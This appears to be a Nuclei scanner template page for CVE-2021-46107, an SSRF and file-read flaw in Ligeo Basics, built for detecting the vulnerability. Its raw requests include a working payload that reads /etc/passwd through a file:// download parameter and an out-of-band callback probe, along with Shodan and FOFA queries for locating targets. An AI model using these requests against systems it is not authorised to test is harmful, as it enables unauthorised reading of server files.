Skip to content
Nuclei Templates

Ligeo Archives Ligeo Basics - Server Side Request Forgery

ID: CVE-2021-46107

Severity: high

Author: ritikchaddha

Tags: cve2021,cve,ligeo,ssrf,lfr,ligeo-archives

Description

Section titled “Description”

Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features.

YAML Source

Section titled “YAML Source”
id: CVE-2021-46107


info:
  name: Ligeo Archives Ligeo Basics - Server Side Request Forgery
  author: ritikchaddha
  severity: high
  description: |
    Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features.
  impact: |
    The impact of this vulnerability is significant as it can result in unauthorized access to sensitive data or systems.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the Server Side Request Forgery vulnerability.
  reference:
    - https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46107
    - https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/
    - https://github.com/Transmetal/CVE-repository-master
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-46107
    cwe-id: CWE-918
    epss-score: 0.01673
    epss-percentile: 0.87383
    cpe: cpe:2.3:a:ligeo-archives:ligeo_basics:02_01-2022:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: ligeo-archives
    product: ligeo_basics
    shodan-query:
      - title:"Ligeo"
      - http.title:"ligeo"
    fofa-query:
      - title="Ligeo"
      - title="ligeo"
    google-query: intitle:"ligeo"
  tags: cve2021,cve,ligeo,ssrf,lfr,ligeo-archives


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /archive/download?file=file:///etc/passwd HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')"
          - "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"
# digest: 4a0a004730450220539aae2c81c13616856c2727885569cf08ca945ba9b03eb2aaa8f0b313f39f12022100bf93ea5338dabbf4c23d498b1871e155f1261d7bc8694e0a59317d874422ffd7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-46107.yaml"

View on Github